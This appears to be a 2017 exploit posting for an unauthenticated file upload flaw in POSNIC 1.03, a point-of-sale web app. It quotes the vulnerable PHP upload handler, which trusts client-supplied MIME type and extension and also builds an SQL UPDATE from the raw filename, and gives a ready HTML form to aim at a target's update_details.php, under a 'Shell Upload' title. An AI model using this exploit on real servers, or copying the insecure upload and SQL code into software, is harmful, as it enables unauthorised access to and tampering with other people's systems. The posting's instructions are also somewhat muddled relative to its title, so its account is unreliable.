
POSNIC 1.03 Shell Upload

Posted on 08 February 2017

<!-- # Exploit Title: POSNIC Unauthenticated File Upload # Date: 04-02-2017 # Exploit Author: Rony Das # Vendor Homepage: http://www.posnic.com # Software Link: https://github.com/Posnic/POSNIC-1.03 # Version: 1.03 # Tested on: Ubuntu 14.04 --> <!-- VULNERABLE CODE: /update_details.php <if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') { $allowedExts = array("gif", "jpeg", "jpg", "png"); $temp = explode(".", $_FILES["file"]["name"]); $extension = end($temp); if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/png")) && ($_FILES["file"]["size"] < 30000) && in_array($extension, $allowedExts) ) { if ($_FILES["file"]["error"] > 0) { echo "Return Code: " . $_FILES["file"]["error"] . "<br>"; } else { $upload = $_FILES["file"]["name"]; $type = $_FILES["file"]["type"]; if (file_exists("upload/" . $_FILES["file"]["name"])) { unlink($upload); } $name = $_FILES["file"]["name"]; move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $name); //echo "Stored in: " . "upload/" . $_FILES["file"]["name"]; $upload; $_SESSION['logo'] = $upload; # Note that filters and validators are separate rule sets and method calls. There is a good reason for this. $db->query("UPDATE store_details SET log ='" . $upload . "',type='" . $type . "'"); --> <!-- Exploit --> <!-- Put your target in the form's action attribute, e.g. action="http://yourtarget.com/posnicdirectory/update_details.php". Then choose an image file and rename it to "posnic.png"; this replaces the logo rather than overwriting it, because the script deletes the existing file if one is already present and then stores the newly uploaded one. The excerpt above accepts the upload based only on the client-supplied MIME type ($_FILES["file"]["type"]) and the filename extension, and no authentication check is visible before the file is written. //if (file_exists("upload/" . $_FILES["file"]["name"])) { // unlink($upload); // } --> <center> <form action="http://localhost/posnic/update_details.php" method="POST" enctype="multipart/form-data"> <p>Upload Logo</p> <input type="file" name="file" id="file"><br><br><br> <input type="submit" name="submit" value="Submit"> </form>

 
